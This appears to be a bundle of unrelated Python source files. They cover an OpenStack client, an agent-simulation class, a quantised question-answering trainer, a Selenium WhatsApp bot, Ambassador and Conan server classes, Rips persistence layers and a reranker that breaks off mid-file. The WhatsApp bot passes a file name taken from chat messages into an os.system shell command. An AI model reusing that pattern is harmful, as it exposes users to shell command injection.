# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
# THE POSSIBILITY OF SUCH DAMAGE.
from luxon import constants as const
from luxon.utils.http import Client
from psychokinetic.openstack.api.identityv3 import IdentityV3
from psychokinetic.openstack.api.networkv2 import NetworkV2
from psychokinetic.openstack.api.imagev2 import ImageV2
from psychokinetic.openstack.api.apibase import APIBase as OrchestrationV1
from psychokinetic.openstack.api.apibase import APIBase as ComputeV1
from psychokinetic.openstack.api.apibase import APIBase as VolumeV1
from psychokinetic.openstack.api.apibase import APIBase as VolumeV2
from psychokinetic.openstack.api.apibase import APIBase as VolumeV3
from psychokinetic.openstack.api.apibase import APIBase as ObjectStoreV1
from psychokinetic.openstack.api.apibase import APIBase as WorkloadsV1
from psychokinetic.openstack.api.apibase import APIBase as S3V1
from psychokinetic.openstack.api.apibase import APIBase as CloudformationV1
from psychokinetic.openstack.api.apibase import APIBase as MeteringV1
class Openstack(Client):
"""Restclient to use on Openstack Implementation.
    Log in and change scope with Keystone, then execute on the chosen
Service.
Args:
keystone_url(str): URL of Keystone API.
region(str): Region of this Openstack implementation.
interface(str): Which openstack interface to use - 'public', 'internal'
or 'admin'.
Example usage:
.. code:: python
os = Openstack(keystone_url='http://example:5000/v3', region="RegionOne")
os.identity.authenticate('admin','password','default')
os.identity.scope(project_name="Customer1", domain="default")
projects = os.identity.execute('GET','tenants').json
"""
def __init__(self, keystone_url,
region='RegionOne',
interface='public'):
        # The user should only be able to select the 'public' or 'internal'
        # interface; lower-case the value given here as well as the ones we receive.
super().__init__()
self['Content-Type'] = const.APPLICATION_JSON
self.keystone_url = keystone_url
        # We store the login token here; it will also be placed in the global
        # HTTP client headers using Client[header] = value.
        # However, we need a copy, because the identity.scope method will
        # change the header to the scoped token. If the user wishes to use the
        # 'scope' or 'unscope' method on identity again, it will need the
        # original unscoped token.
self._login_token = None
        # Kept for tracking purposes - important, don't remove - in case the
        # user wishes to know the current environment information.
self._scoped_token = None
        # Dictionary whose keys are the service 'type', i.e. image, metering,
        # identity, network, orchestration, volume, volumev2, volumev3, etc.,
        # and whose values are the URLs. It is not necessary to store region
        # and interface, because they are selected at Openstack client init.
        # The identity.scope method will populate these values.
self._user_endpoints = {}
        # The endpoint maps below have to be populated in any case.
self._admin_endpoints = {}
self._public_endpoints = {}
        # The following interface and region are used by identity.scope
        # to determine which endpoints are stored in the maps above.
self.interface = interface
self.region = region
@property
def identity(self):
return IdentityV3(self, 'identity')
@property
def compute(self):
return ComputeV1(self, 'compute')
@property
def orchestration(self):
return OrchestrationV1(self, 'orchestration')
@property
def network(self):
return NetworkV2(self, 'network')
@property
def volume(self):
return VolumeV1(self, 'volume')
@property
def volumev2(self):
return VolumeV2(self, 'volumev2')
@property
def volumev3(self):
return VolumeV3(self, 'volumev3')
@property
def image(self):
return ImageV2(self, 'image')
@property
def object_store(self):
return ObjectStoreV1(self, 'object-store')
@property
def workloads(self):
return WorkloadsV1(self, 'workloads')
@property
def s3(self):
return S3V1(self, 's3')
@property
def cloudformation(self):
return CloudformationV1(self, 'cloudformation')
@property
def metering(self):
return MeteringV1(self, 'metering')
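# A hedged usage sketch. The docstring example above only exercises identity;
# the service calls below assume the per-service clients expose the same
# execute(method, path) pattern via APIBase, which is not verified here:
#
#   os = Openstack(keystone_url='http://example:5000/v3', region='RegionOne')
#   os.identity.authenticate('admin', 'password', 'default')
#   os.identity.scope(project_name='Customer1', domain='default')
#   servers = os.compute.execute('GET', 'servers').json
#   images = os.image.execute('GET', 'v2/images').json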
|
# encoding: utf-8
from login import LoginHandler
__all__ = ['LoginHandler']
|
import numpy as np
import pandas as pd
import gc
from multiprocessing import Pool, cpu_count
from functools import partial
class Globe:
"""
    Globe is used to store and process information about the world
and an array of generated agents.
"""
def __init__(self, df, processes=cpu_count() - 1, splits=1):
"""
:param processes:
The number of child processes to be created by the pool. Must be a
minimum of one.
:param splits:
The number of subslices each process will be sent. For larger models
this is needed because there is a limit to the size of data that can
be sent between processes.
"""
self.df = df
self.processes = processes
self.splits = splits
self.pool = Pool(self.processes)
def __getstate__(self):
self_dict = self.__dict__.copy()
del self_dict['pool']
return self_dict
def max_value(self, attribute):
"""
Returns the maximum value for an attribute.
"""
return self.df[attribute].max()
def _gen_agents(self, array):
return pd.concat(
[self.generator(self.df, country, len(population))
for country, population
in array.groupby(array)]
)
def create_agents(self, generator):
"""
Given information on a set of countries and a generator function,
generate the agents and assign the results to ``self.agents``.
        :param generator: A function which generates the agents; it is called
            as ``generator(df, country, n)`` and should return a DataFrame of
            ``n`` agents for the given country.
"""
self.generator = generator
country_array = pd.concat([pd.Series([c] * k["Population"]) for c, k in self.df.iterrows()])
country_array.index = range(len(country_array))
# Garbage collect before creating new processes.
gc.collect()
"""
self.agents = pd.concat(
self.pool.imap(self._gen_agents,
np.array_split(country_array, self.processes * self.splits))
)
self.agents.index = range(len(self.agents))
"""
self.agents = np.concatenate(
self.pool.imap(self._gen_agents,
np.array_split(country_array, self.processes * self.splits))
)
def run_par(self, function, **kwargs):
"""
Run a function on the agents in parallel.
"""
columns = kwargs["columns"] if "columns" in kwargs else self.agents.columns
# Garbage collect before creating new processes.
gc.collect()
return pd.concat(self.pool.imap(partial(function, **kwargs),
np.array_split(self.agents[columns],
self.processes * self.splits)))
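# A minimal usage sketch of Globe. It assumes a country-indexed DataFrame with
# a "Population" column; ``make_agents`` and ``double_age`` are hypothetical
# callbacks showing the expected signatures:
#
#   import numpy as np
#   import pandas as pd
#
#   def make_agents(df, country, n):
#       # called once per country with the number of agents to create
#       return pd.DataFrame({"country": [country] * n,
#                            "age": np.random.randint(0, 90, size=n)})
#
#   def double_age(chunk, columns=None):
#       # receives a slice of the agents plus the keyword args given to run_par
#       chunk["age"] = chunk["age"] * 2
#       return chunk
#
#   countries = pd.DataFrame({"Population": [3, 2]}, index=["Utopia", "Erewhon"])
#   globe = Globe(countries, processes=2, splits=1)
#   globe.create_agents(make_agents)
#   result = globe.run_par(double_age, columns=["country", "age"])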
|
# coding=utf-8
# Copyright 2020 The HuggingFace Team All rights reserved.
# Copyright 2021 NVIDIA Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
A subclass of `Trainer` specific to Question-Answering tasks
"""
import logging
import os
import torch
from torch.utils.data import DataLoader
import quant_trainer
from transformers import Trainer, is_torch_tpu_available
from transformers.trainer_utils import PredictionOutput
logger = logging.getLogger(__name__)
if is_torch_tpu_available():
import torch_xla.core.xla_model as xm
import torch_xla.debug.metrics as met
class QuestionAnsweringTrainer(Trainer):
def __init__(self, *args, eval_examples=None, post_process_function=None, quant_trainer_args=None, **kwargs):
super().__init__(*args, **kwargs)
self.eval_examples = eval_examples
self.post_process_function = post_process_function
self.quant_trainer_args = quant_trainer_args
self.calib_num = 128 # default number of calibration samples
def get_calib_dataloader(self, calib_dataset=None):
"""
Returns the calibration dataloader :class:`~torch.utils.data.DataLoader`.
Args:
calib_dataset (:obj:`torch.utils.data.Dataset`, `optional`)
"""
if calib_dataset is None and self.calib_dataset is None:
raise ValueError("Trainer: calibration requires an calib_dataset.")
calib_dataset = calib_dataset if calib_dataset is not None else self.calib_dataset
calib_dataset = self._remove_unused_columns(calib_dataset, description="Calibration")
return DataLoader(
calib_dataset,
batch_size=self.args.eval_batch_size,
collate_fn=self.data_collator,
drop_last=self.args.dataloader_drop_last,
num_workers=self.args.dataloader_num_workers,
pin_memory=self.args.dataloader_pin_memory,
shuffle=True,
)
def calibrate(self, calib_dataset=None):
calib_dataset = self.train_dataset if calib_dataset is None else calib_dataset
calib_dataloader = self.get_calib_dataloader(calib_dataset)
model = self.model
quant_trainer.configure_model(model, self.quant_trainer_args, calib=True)
model.eval()
quant_trainer.enable_calibration(model)
logger.info("***** Running calibration *****")
logger.info(f" Num examples = {self.calib_num}")
logger.info(f" Batch size = {calib_dataloader.batch_size}")
for step, inputs in enumerate(calib_dataloader):
# Prediction step
loss, logits, labels = self.prediction_step(model, inputs, prediction_loss_only=True)
if (step + 1) * calib_dataloader.batch_size >= self.calib_num:
break
quant_trainer.finish_calibration(model, self.quant_trainer_args)
self.model = model
def evaluate(self, eval_dataset=None, eval_examples=None, ignore_keys=None, metric_key_prefix: str = "eval"):
eval_dataset = self.eval_dataset if eval_dataset is None else eval_dataset
eval_dataloader = self.get_eval_dataloader(eval_dataset)
eval_examples = self.eval_examples if eval_examples is None else eval_examples
# Temporarily disable metric computation, we will do it in the loop here.
compute_metrics = self.compute_metrics
self.compute_metrics = None
eval_loop = self.prediction_loop if self.args.use_legacy_prediction_loop else self.evaluation_loop
try:
output = eval_loop(
eval_dataloader,
description="Evaluation",
# No point gathering the predictions if there are no metrics, otherwise we defer to
# self.args.prediction_loss_only
prediction_loss_only=True if compute_metrics is None else None,
ignore_keys=ignore_keys,
)
finally:
self.compute_metrics = compute_metrics
if self.post_process_function is not None and self.compute_metrics is not None:
eval_preds = self.post_process_function(eval_examples, eval_dataset, output.predictions)
metrics = self.compute_metrics(eval_preds)
# Prefix all keys with metric_key_prefix + '_'
for key in list(metrics.keys()):
if not key.startswith(f"{metric_key_prefix}_"):
metrics[f"{metric_key_prefix}_{key}"] = metrics.pop(key)
self.log(metrics)
else:
metrics = {}
if self.args.tpu_metrics_debug or self.args.debug:
# tpu-comment: Logging debug metrics for PyTorch/XLA (compile, execute times, ops, etc.)
xm.master_print(met.metrics_report())
self.control = self.callback_handler.on_evaluate(self.args, self.state, self.control, metrics)
return metrics
def predict(self, predict_dataset, predict_examples, ignore_keys=None, metric_key_prefix: str = "test"):
predict_dataloader = self.get_test_dataloader(predict_dataset)
# Temporarily disable metric computation, we will do it in the loop here.
compute_metrics = self.compute_metrics
self.compute_metrics = None
eval_loop = self.prediction_loop if self.args.use_legacy_prediction_loop else self.evaluation_loop
try:
output = eval_loop(
predict_dataloader,
description="Prediction",
# No point gathering the predictions if there are no metrics, otherwise we defer to
# self.args.prediction_loss_only
prediction_loss_only=True if compute_metrics is None else None,
ignore_keys=ignore_keys,
)
finally:
self.compute_metrics = compute_metrics
if self.post_process_function is None or self.compute_metrics is None:
return output
predictions = self.post_process_function(predict_examples, predict_dataset, output.predictions, "predict")
metrics = self.compute_metrics(predictions)
# Prefix all keys with metric_key_prefix + '_'
for key in list(metrics.keys()):
if not key.startswith(f"{metric_key_prefix}_"):
metrics[f"{metric_key_prefix}_{key}"] = metrics.pop(key)
return PredictionOutput(predictions=predictions.predictions, label_ids=predictions.label_ids, metrics=metrics)
def save_onnx(self, output_dir="./"):
eval_dataset = self.eval_dataset
eval_dataloader = self.get_eval_dataloader(eval_dataset)
batch = next(iter(eval_dataloader))
# saving device - to make it consistent
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# convert to tuple
input_tuple = tuple(v.to(device) for k, v in batch.items())
logger.info("Converting model to be onnx compatible")
from pytorch_quantization.nn import TensorQuantizer
TensorQuantizer.use_fb_fake_quant = True
model = self.model.to(device)
model.eval()
model.float()
model_to_save = model.module if hasattr(model, "module") else model
quant_trainer.configure_model(model_to_save, self.quant_trainer_args)
output_model_file = os.path.join(output_dir, "model.onnx")
logger.info(f"exporting model to {output_model_file}")
axes = {0: "batch_size", 1: "seq_len"}
torch.onnx.export(
model_to_save,
input_tuple,
output_model_file,
export_params=True,
opset_version=13,
do_constant_folding=True,
input_names=["input_ids", "attention_mask", "token_type_ids"],
output_names=["output_start_logits", "output_end_logits"],
dynamic_axes={
"input_ids": axes,
"attention_mask": axes,
"token_type_ids": axes,
"output_start_logits": axes,
"output_end_logits": axes,
},
verbose=True,
)
logger.info("onnx export finished")
|
from __future__ import print_function
import time
from html.parser import HTMLParser
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
import sys
import re
from profanity_check import predict, predict_prob
from bs4 import BeautifulSoup
import datetime
import pickle
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
import threading
'''
Awesomeness lent from: https://github.com/dhruvramani/Makeathon-18
'''
driver = webdriver.Firefox(executable_path=r'./Gecko/geckodriver')
driver.get("https://web.whatsapp.com/")
time.sleep(2)
wait = WebDriverWait(driver, 600)
SCOPES = ['https://www.googleapis.com/auth/calendar']
def strip_tags(html):
return re.sub('<[^<]+?>', '', html)
def search_downloads(file_name):
while(1):
if file_name in os.listdir(os.path.join(os.path.expanduser("~"), "Downloads")):
subject = file_name.split('_')[0]
if not os.path.exists('{}/Notes/{}'.format(os.path.expanduser('~'), subject)):
os.mkdir('{}/Notes/{}'.format(os.path.expanduser('~'), subject))
os.system('mv {}/Downloads/{} {}/Notes/{}/{}'.format(os.path.expanduser('~'), file_name, os.path.expanduser('~'), subject, file_name))
break
def create_event(event_string, type):
creds = None
if os.path.exists('token.pickle'):
with open('token.pickle', 'rb') as token:
creds = pickle.load(token)
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(
'credentials.json', SCOPES)
creds = flow.run_local_server(port=0)
with open('token.pickle', 'wb') as token:
pickle.dump(creds, token)
service = build('calendar', 'v3', credentials=creds)
if(type==0):
mesg = event_string.split("\n")
print(mesg)
if "tomorrow" in mesg[0].lower():
start_date = str(datetime.date.today() + datetime.timedelta(days=1))
end_date = str(datetime.date.today() + datetime.timedelta(days=1))
elif "today" in mesg[0].lower():
start_date = str(datetime.date.today())
end_date = str(datetime.date.today())
classroom = mesg[1]
mesg = mesg[2:]
for line in mesg:
line = line.split(" ")
time = line[0]
course = line[2]
time = time.split("-")
if(len(time[0])==2):
start_time = '{}:00'.format(time[0])
else:
start_time = time[0]
if(len(time[1])==2):
end_time = '{}:00'.format(time[1])
else:
end_time = time[1]
event = {
'summary': course,
'location': classroom,
'description': course,
'start': {
'dateTime': '{}T{}:00+05:30'.format(start_date, start_time),
},
'end': {
'dateTime': '{}T{}:00+05:30'.format(end_date, end_time),
},
}
print(event)
event = service.events().insert(calendarId='primary', body=event).execute()
print('Event created: {}'.format(event.get('htmlLink')))
else:
mesg = event_string.split("\n")
print(mesg)
date_time = mesg[1].split(" ")
event_loc = mesg[2]
event_name = mesg[3]
start_date = date_time[0]
end_date = date_time[0]
start_time = date_time[1].split("-")[0]
end_time = date_time[1].split("-")[1]
event = {
'summary': event_name,
'location': event_loc,
'description': event_name,
'start': {
'dateTime': '{}T{}:00+05:30'.format(start_date, start_time),
},
'end': {
'dateTime': '{}T{}:00+05:30'.format(end_date, end_time),
},
}
print(event)
event = service.events().insert(calendarId='primary', body=event).execute()
print('Event created: {}'.format(event.get('htmlLink')))
# date yyyy-mm-dd, time 24 hrs format
def send_message(target, string):
#x_arg = '//span[contains(@title,' + target + ')]'
x_arg = '//span[@title=' + target + ']'
print(x_arg)
group_title = wait.until(EC.presence_of_element_located((By.XPATH, x_arg)))
print(group_title.get_attribute('innerHTML'))
group_title.click()
inp_xpath = '//*[@id="main"]/footer/div[1]/div[2]/div/div[2]'
input_box = wait.until(EC.presence_of_element_located((By.XPATH, inp_xpath)))
print(input_box)
string = string.replace('\n', Keys.SHIFT + Keys.ENTER + Keys.SHIFT)
input_box.send_keys(string + Keys.ENTER)
def mainMessage(sleep=0):
time.sleep(sleep)
rightChatBoxes = driver.find_elements_by_css_selector("._2ko65")
print(rightChatBoxes)
i = 1
for rightChatBox in rightChatBoxes:
soup = BeautifulSoup(rightChatBox.get_attribute('innerHTML'), 'html.parser')
print(soup.prettify())
name = soup.select("._19RFN")[0].get('title')
mesg_time = soup.select("._0LqQ")[0].get_text()
chatHead = driver.find_elements_by_css_selector(".P6z4j")[0]
no_messages = int(chatHead.get_attribute('innerHTML'))
print(no_messages)
rightChatBox.click()
if i == 1:
time.sleep(sleep)
i = i+1
try :
messages = driver.find_elements_by_css_selector("._F7Vk")[-no_messages:] #_2Wx_5 _3LG3B #_12pGw
print(messages)
for message in messages:
mesg = strip_tags(message.get_attribute('innerHTML'))
print(mesg)
if ".pdf" in mesg:
download_buttons = driver.find_elements_by_css_selector("._1mrMQ")[-no_messages:] #[0].click() #_1zGQT oty3x #_1mrMQ
for download_button in download_buttons:
if mesg in download_button.get_attribute('innerHTML'):
download_button.click()
t1 = threading.Thread(target=search_downloads, args=(mesg,))
t1.start()
break
#print(download_button)
else:
message.click()
mlist = []
mlist.append(mesg)
is_offensive = predict(mlist)[0]
if is_offensive:
driver.find_elements_by_css_selector("._2-qoA")[0].click() #
print("click1")
driver.find_element(By.XPATH, '//*[@title="Star message"]').click()
print("click2")
send_message("'Offensive'", "{} @ {} : {}".format(name, mesg_time, mesg))
if "timetable" in mesg.lower():
create_event(mesg, 0)
send_message("'Timetable'", mesg)
if "event" in mesg.lower():
create_event(mesg, 1)
except Exception as e:
print(e)
pass
count = 4
while 1:
mainMessage(count)
time.sleep(1)
count = 0
time.sleep(10)
driver.quit()
|
from typing import Any, Dict, List, Optional, Tuple, Union, TYPE_CHECKING
from ..config import Config
from ..resource import Resource
from ..utils import RichStatus
if TYPE_CHECKING:
from .ir import IR
class IRResource (Resource):
"""
A resource within the IR.
"""
@staticmethod
def helper_sort_keys(res: 'IRResource', k: str) -> Tuple[str, List[str]]:
return k, list(sorted(res[k].keys()))
@staticmethod
def helper_rkey(res: 'IRResource', k: str) -> Tuple[str, str]:
return '_rkey', res[k]
@staticmethod
def helper_list(res: 'IRResource', k: str) -> Tuple[str, list]:
return k, list([ x.as_dict() for x in res[k] ])
__as_dict_helpers: Dict[str, Any] = {
"apiVersion": "drop",
"logger": "drop",
"ir": "drop"
}
_active: bool
_errored: bool
def __init__(self, ir: 'IR', aconf: Config,
rkey: str,
kind: str,
name: str,
namespace: Optional[str]=None,
metadata_labels: Optional[str]=None,
location: str = "--internal--",
apiVersion: str="ambassador/ir",
**kwargs) -> None:
# print("IRResource __init__ (%s %s)" % (kind, name))
if not namespace:
namespace = ir.ambassador_namespace
self.namespace = namespace
super().__init__(rkey=rkey, location=location,
kind=kind, name=name, namespace=namespace, metadata_labels=metadata_labels,
apiVersion=apiVersion,
**kwargs)
self.ir = ir
self.logger = ir.logger
self._errored = False
self.__as_dict_helpers = IRResource.__as_dict_helpers
self.add_dict_helper("_errors", IRResource.helper_list)
self.add_dict_helper("_referenced_by", IRResource.helper_sort_keys)
self.add_dict_helper("rkey", IRResource.helper_rkey)
# Make certain that _active has a default...
self.set_active(False)
# ...before we override it with the setup results.
self.set_active(self.setup(ir, aconf))
def lookup(self, key: str, *args, default_class: Optional[str]=None, default_key: Optional[str]=None) -> Any:
"""
Look up a key in this IRResource, with a fallback to the Ambassador module's "defaults"
element.
Here's the resolution order:
- if key is present in self, use its value.
- if not, we'll try to look up a fallback value in the Ambassador module:
- the key for the lookup will be the value of "default_key" if that's set,
otherwise the same key we just tried in self.
- if "default_class" wasn't passed in, and self.default_class isn't set, just
look up a fallback value from the "defaults" dict in the Ambassador module.
- otherwise, look up the default class in Ambassador's "defaults", then look up
the fallback value from that dict (the passed in "default_class" wins if both
are set).
        - (if the default class is '/', explicitly skip descending into a sub-directory)
- if no key is present in self, and no fallback is found, but a default value was passed
in as *args[0], return that.
- if all else fails, return None.
:param key: the key to look up
:param default_class: the default class for the fallback lookup (optional, see above)
:param default_key: the key for the fallback lookup (optional, defaults to key)
:param args: an all-else-fails default value can go here, see above
:return: Any
"""
value = self.get(key, None)
default_value = None
if len(args) > 0:
default_value = args[0]
if value is None:
get_from = self.ir.ambassador_module.get('defaults', {})
dfl_class = default_class
if not dfl_class:
dfl_class = self.get('default_class', None)
if dfl_class and (dfl_class != '/'):
get_from = get_from.get(dfl_class, None)
if get_from:
if not default_key:
default_key = key
value = get_from.get(default_key, default_value)
else:
value = default_value
return value
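    # A hedged illustration of the fallback order documented above; the keys
    # and values are hypothetical, not real Ambassador configuration:
    #
    #   # Ambassador module: defaults = {"foo": 1, "mapping": {"bar": 2}}
    #   res.lookup("foo")                           # value from res if set, else 1
    #   res.lookup("bar", default_class="mapping")  # falls back to defaults["mapping"]["bar"]
    #   res.lookup("missing", 42)                   # 42, the all-else-fails default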
def add_dict_helper(self, key: str, helper) -> None:
self.__as_dict_helpers[key] = helper
def set_active(self, active: bool) -> None:
self._active = active
def is_active(self) -> bool:
return self._active
def __bool__(self) -> bool:
return self._active and not self._errored
def setup(self, ir: 'IR', aconf: Config) -> bool:
# If you don't override setup, you end up with an IRResource that's always active.
return True
def add_mappings(self, ir: 'IR', aconf: Config) -> None:
# If you don't override add_mappings, uh, no mappings will get added.
pass
def post_error(self, error: Union[str, RichStatus]):
self._errored = True
if not self.ir:
raise Exception("post_error cannot be called before __init__")
self.ir.post_error(error, resource=self)
# super().post_error(error)
# self.ir.logger.error("%s: %s" % (self, error))
def skip_key(self, k: str) -> bool:
if k.startswith('__') or k.startswith("_IRResource__"):
return True
if self.__as_dict_helpers.get(k, None) == 'drop':
return True
return False
def as_dict(self) -> Dict:
od: Dict[str, Any] = {}
for k in self.keys():
if self.skip_key(k):
continue
helper = self.__as_dict_helpers.get(k, None)
if helper:
new_k, v = helper(self, k)
if new_k and v:
od[new_k] = v
elif isinstance(self[k], IRResource):
od[k] = self[k].as_dict()
elif self[k] is not None:
od[k] = self[k]
return od
@staticmethod
def normalize_service(service: str) -> str:
normalized_service = service
if service.lower().startswith("http://"):
normalized_service = service[len("http://"):]
elif service.lower().startswith("https://"):
normalized_service = service[len("https://"):]
return normalized_service
|
from conans import DEFAULT_REVISION_V1
from conans.model.ref import PackageReference
class CommonService(object):
def _get_latest_pref(self, pref):
ref = self._get_latest_ref(pref.ref)
pref = PackageReference(ref, pref.id)
tmp = self._server_store.get_last_package_revision(pref)
if not tmp:
prev = DEFAULT_REVISION_V1
else:
prev = tmp.revision
return pref.copy_with_revs(ref.revision, prev)
def _get_latest_ref(self, ref):
tmp = self._server_store.get_last_revision(ref)
if not tmp:
rrev = DEFAULT_REVISION_V1
else:
rrev = tmp.revision
return ref.copy_with_rev(rrev)
def remove_conanfile(self, ref):
self._authorizer.check_delete_conan(self._auth_user, ref)
self._server_store.remove_conanfile(ref)
def remove_packages(self, ref, package_ids_filter):
"""If the revision is not specified it will remove the packages from all the recipes
(v1 compatibility)"""
for package_id in package_ids_filter:
pref = PackageReference(ref, package_id)
self._authorizer.check_delete_package(self._auth_user, pref)
if not package_ids_filter: # Remove all packages, check that we can remove conanfile
self._authorizer.check_delete_conan(self._auth_user, ref)
for rrev in self._server_store.get_recipe_revisions(ref):
self._server_store.remove_packages(ref.copy_with_rev(rrev.revision),
package_ids_filter)
def remove_package(self, pref):
self._authorizer.check_delete_package(self._auth_user, pref)
for rrev in self._server_store.get_recipe_revisions(pref.ref):
new_pref = pref.copy_with_revs(rrev.revision, pref.revision)
for prev in self._server_store.get_package_revisions(new_pref):
full_pref = new_pref.copy_with_revs(rrev.revision, prev.revision)
self._server_store.remove_package(full_pref)
def remove_all_packages(self, ref):
for rrev in self._server_store.get_recipe_revisions(ref):
self._server_store.remove_all_packages(ref.copy_with_rev(rrev.revision))
def remove_conanfile_files(self, ref, files):
self._authorizer.check_delete_conan(self._auth_user, ref)
self._server_store.remove_conanfile_files(ref, files)
def remove_conanfile_file(self, ref, path):
self.remove_conanfile_files(ref, [path])
|
from .functional import RipsDiagram, Rips0Diagram
import torch.nn as nn
class RipsLayer(nn.Module):
"""
Define a Rips persistence layer that will use the Rips Diagram function
Inpute:
maxdim : maximum homology dimension (default=0)
reduction_flags : PH computation options from bats
see details in:
https://bats-tda.readthedocs.io/en/latest/tutorials/Rips.html#Algorithm-optimization
"""
def __init__(self, maxdim = 0, degree = -1, metric = 'euclidean', sparse = False, eps=0.5, reduction_flags=()):
super(RipsLayer, self).__init__()
self.maxdim = maxdim
self.degree = degree
self.sparse = sparse
self.eps = eps
self.PD = RipsDiagram()
self.metric = metric
self.reduction_flags = reduction_flags
def forward(self, x):
        xnp = x.cpu().detach().numpy()  # numpy copy of the input (currently unused)
        dgms = self.PD.apply(x, self.maxdim, self.degree, self.metric, self.sparse, self.eps, *self.reduction_flags)
return dgms
class Rips0Layer(nn.Module):
"""
Define a Rips persistence layer that will use the Rips Diagram function
Only computes dimension 0 using Union-Find
"""
def __init__(self, metric = 'euclidean'):
super(Rips0Layer, self).__init__()
self.metric = metric
self.PD = Rips0Diagram()
def forward(self, x):
        xnp = x.cpu().detach().numpy()  # numpy copy of the input (currently unused)
dgms = self.PD.apply(x, self.metric)
return dgms
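# A minimal usage sketch, assuming the bats-backed RipsDiagram/Rips0Diagram
# functions imported above are available; the point cloud, the loss, and the
# indexing of the returned diagrams are illustrative assumptions:
#
#   import torch
#
#   layer = RipsLayer(maxdim=1)
#   x = torch.rand(50, 2, requires_grad=True)   # 50 random points in the plane
#   dgms = layer(x)                             # persistence diagrams
#   loss = dgms[0][:, 1].sum()                  # e.g. sum of H0 death times
#   loss.backward()                             # gradients flow back to x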
|
from genessa.models.simple import SimpleCell
from .mutation import Mutation
class SimpleModel(SimpleCell, Mutation):
"""
Class defines a cell with a single protein state subject to negative feedback. All reaction rates are based on linear propensity functions.
Attributes:
name (str) - name of controlled gene
Inherited Attributes:
transcripts (dict) - {name: node_id} pairs
proteins (dict) - {name: node_id} pairs
phosphorylated (dict) - {name: node_id} pairs
nodes (np.ndarray) - vector of node indices
node_key (dict) - {state dimension: node id} pairs
reactions (list) - list of reaction objects
stoichiometry (np.ndarray) - stoichiometric coefficients, (N,M)
N (int) - number of nodes
M (int) - number of reactions
I (int) - number of inputs
"""
def __init__(self,
name='X',
k=1,
g=1,
lambda_g=0,
lambda_k=0):
"""
Instantiate a simple model of a single protein.
Args:
name (str) - name of controlled protein
k (float) - protein synthesis rate constant
g (float) - protein decay rate constant
lambda_g (float) - degradation growth rate dependence
lambda_k (float) - synthesis growth rate dependence
"""
self.name = name
# instantiate linear cell with a single gene activated by the input
gene_kw = dict(g=g, growth_dependence=lambda_g)
super().__init__(genes=(self.name,), I=1, **gene_kw)
# add synthesis driven by input
self.add_activation(protein=self.name,
activator='IN',
k=k,
growth_dependence=lambda_k)
def add_post_translational_feedback(self,
k=None,
atp_sensitive=2,
carbon_sensitive=2,
ribosome_sensitive=1,
growth_dependence=0,
**kwargs):
"""
Adds linear negative feedback applied to protein level.
Args:
k (float) - rate parameter (feedback strength)
atp_sensitive (int) - order of metabolism dependence
carbon_sensitive (int) - order of carbon availability dependence
ribosome_sensitive (int) - order of ribosome dependence
growth_dependence (float) - log k / log growth
kwargs: keyword arguments for reaction
"""
self.add_linear_feedback(
sensor=self.name,
target=self.name,
mode='protein',
k=k,
atp_sensitive=atp_sensitive,
carbon_sensitive=carbon_sensitive,
ribosome_sensitive=ribosome_sensitive,
growth_dependence=growth_dependence,
**kwargs)
def add_feedback(self, eta, perturbed=False, lambda_eta=0):
"""
Add feedback.
Args:
eta (float) - feedback strength
perturbed (bool) - if True, feedback is sensitive to perturbation
lambda_eta (float) - feedback growth rate dependence
"""
self.add_post_translational_feedback(
k=eta,
perturbed=perturbed,
growth_dependence=lambda_eta)
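# A hedged usage sketch; parameter values are illustrative, and simulating the
# resulting genessa cell is outside the scope of this module:
#
#   model = SimpleModel(name='X', k=1, g=1, lambda_g=0, lambda_k=0)
#   model.add_feedback(eta=0.5, perturbed=False, lambda_eta=0)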
|
import contextlib
import numpy as np
import torch
from torch import nn
from transformers import BertForNextSentencePrediction
from capreolus import ConfigOption, Dependency
from capreolus.reranker import Reranker
from capreolus.utils.loginit import get_logger
logger = get_logger(__name__)
# official weights converted with:
# def convert(name):
# from transformers import BertTokenizer, BertForNextSentencePrediction, TFBertForNextSentencePrediction
# tokenizer = BertTokenizer.from_pretrained("bert-large-uncased")
# state = torch.load(f"/GW/NeuralIR/nobackup/birch-emnlp_bert4ir_v2/models/saved.{name}_1", map_location="cpu")
# model = BertForNextSentencePrediction.from_pretrained("bert-large-uncased")
# model.load_state_dict(state["model"].state_dict())
# output = f"/GW/NeuralIR/nobackup/birch-emnlp_bert4ir_v2/models/export/birch-bert-large-{name}"
# os.makedirs(output, exist_ok=True)
# model.save_pretrained(output)
# tokenizer.save_pretrained(output)
# # tf2 support
# tf_model = TFBertForNextSentencePrediction.from_pretrained(output, from_pt=True)
# tf_model.save_pretrained(output)
class Birch_Class(nn.Module):
def __init__(self, extractor, config):
super().__init__()
self.config = config
if config["hidden"] == 0:
self.combine = nn.Linear(config["topk"], 1, bias=False)
with torch.no_grad():
self.combine.weight = nn.Parameter(torch.ones_like(self.combine.weight) / config["topk"])
else:
assert config["hidden"] > 0
self.combine = nn.Sequential(nn.Linear(config["topk"], config["hidden"]), nn.ReLU(), nn.Linear(config["hidden"], 1))
# original model file (requires apex):
# state = torch.load("/GW/NeuralIR/nobackup/birch-emnlp_bert4ir_v2/models/saved.msmarco_mb_1", map_location="cpu")
# self.bert = state["model"]
# saved.msmarco_mb_1 weights exported from the official apex model:
# self.bert = BertForNextSentencePrediction.from_pretrained("bert-large-uncased")
